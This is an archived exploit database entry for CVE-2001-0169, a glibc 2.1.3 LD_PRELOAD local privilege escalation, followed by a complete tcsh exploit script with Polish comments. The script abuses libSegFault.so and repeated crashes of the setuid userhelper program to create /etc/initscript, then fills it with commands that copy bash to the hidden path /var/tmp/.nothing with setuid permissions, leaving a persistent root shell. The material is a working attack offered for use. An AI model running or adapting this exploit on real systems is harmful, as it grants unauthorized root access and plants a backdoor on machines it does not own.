GLIBC 2.1.3 - 'LD_PRELOAD' Local Privilege Escalation

Author: Shadow
type: local
platform: linux
port: 
date_added: 2001-03-03 
date_updated: 2017-11-22 
verified: 1 
codes: OSVDB-1731;CVE-2001-0169 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comglibc-2.1.3.tar.gz

#!/bin/tcsh
# przyklad wykorzystania dziury w LD_PRELOAD
# shadow (tested on redhat 6.0, should work on others)

if ( -e /etc/initscript ) echo uwaga: /etc/initscript istnieje
cd /lib
umask 0
setenv LD_PRELOAD libSegFault.so
setenv SEGFAULT_OUTPUT_NAME /etc/initscript
echo czekaj... to moze chwile potrwac...
while (! -e /etc/initscript )
  ( userhelper >& /dev/null & ; killall -11 userhelper >& /dev/null ) > /dev/null
end

echo utworzylem plik initscript

cat > /etc/initscript << _init_
cp /bin/bash /var/tmp/.nothing
chmod 6755 /var/tmp/.nothing
rm /etc/initscript
_init_

echo i nawet go podmienilem

# milw0rm.com [2001-03-04]